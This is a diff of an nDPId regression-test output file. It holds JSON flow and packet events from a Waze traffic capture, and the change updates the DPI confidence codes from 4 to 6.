00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880576,"flow_last_seen":1435587880576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880576,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1435587880576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880576,"pkt":"ABoRAAACABoRAAABCABFAAA0U4FAAEAG6tYKECWdyKAEH6vXAFAtnZBdDlnt+YARAVu2DAAAAQEICgAIcK6K\/GDA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1435587880577,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880577,"pkt":"ABoRAAACABoRAAABCABFAAAodUFAABAG+SLIoAQfChAlnQBQq9cOWe35LZ2QXlAQ\/\/9M8gAA"} @@ -169,59 +169,59 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1435587894241,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587894241,"pkt":"ABoRAAACABoRAAABCABFAAA87+5AAEAGZNsKCAABLjOtto0mAbvDfJnqAAAAAKAC\/\/\/\/twAAAgQFtAQCCAoACHYEAAAAAAEDAwg="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1435587894244,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587894244,"pkt":"ABoRAAACABoRAAABCABFAAAodXFAABAGD20uM622CggAAQG7jSY8g2YVw3yZ61AS\/\/86\/gAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1435587894244,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587894244,"pkt":"ABoRAAACABoRAAABCABFAAAo7+9AAEAGZO4KCAABLjOtto0mAbvDfJnrPINmFlAQ\/\/86\/wAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587894241,"flow_last_seen":1435587894323,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587894323,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":537,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587894241,"flow_last_seen":1435587894759,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1435587894759,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587894241,"flow_last_seen":1435587894323,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587894323,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":537,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587894241,"flow_last_seen":1435587894759,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1435587894759,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587898822,"flow_last_seen":1435587898822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587898822,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1435587898822,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587898822,"pkt":"ABoRAAACABoRAAABCABFAAA8qMZAAEAGamAKCAABbKiw5MaMAbuJft8IAAAAAKAC\/\/93xAAAAgQFtAQCCAoACHfOAAAAAAEDAwg="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1435587898824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587898824,"pkt":"ABoRAAACABoRAAABCABFAAAodXtAABAGzb9sqLDkCggAAQG7xox2gSD3iX7fCVAS\/\/+\/9AAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1435587898824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587898824,"pkt":"ABoRAAACABoRAAABCABFAAAoqMdAAEAGanMKCAABbKiw5MaMAbuJft8JdoEg+FAQ\/\/+\/9QAA"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587898822,"flow_last_seen":1435587898874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1435587898874,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587898822,"flow_last_seen":1435587898874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1435587898874,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587905035,"flow_last_seen":1435587905035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587905035,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1435587905035,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587905035,"pkt":"ABoRAAACABoRAAABCABFAAA82iNAAEAGeqYKCAABLjOtto0pAbvwXaAfAAAAAKAC\/\/\/IZgAAAgQFtAQCCAoACHo8AAAAAAEDAwg="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1435587905038,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587905038,"pkt":"ABoRAAACABoRAAABCABFAAAodYZAABAGD1guM622CggAAQG7jSkPol\/g8F2gIFAS\/\/86+wAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1435587905039,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587905039,"pkt":"ABoRAAACABoRAAABCABFAAAo2iRAAEAGerkKCAABLjOtto0pAbvwXaAgD6Jf4VAQ\/\/86\/AAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587905035,"flow_last_seen":1435587905111,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587905111,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01089{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":580,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587905035,"flow_last_seen":1435587905510,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587905510,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} -01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587905035,"flow_last_seen":1435587905565,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1435587905565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587905035,"flow_last_seen":1435587905111,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587905111,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01089{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":580,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587905035,"flow_last_seen":1435587905510,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587905510,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} +01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587905035,"flow_last_seen":1435587905565,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1435587905565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880580,"flow_last_seen":1435587880589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880580,"flow_last_seen":1435587880589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1435587868632,"flow_last_seen":1435587869162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1624,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587869162,"flow_last_seen":1435587869302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871656,"flow_last_seen":1435587871946,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871658,"flow_last_seen":1435587871945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871941,"flow_last_seen":1435587872478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":552,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872476,"flow_last_seen":1435587872705,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872702,"flow_last_seen":1435587872838,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":543,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587898822,"flow_last_seen":1435587899372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1435587868632,"flow_last_seen":1435587869162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1624,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} 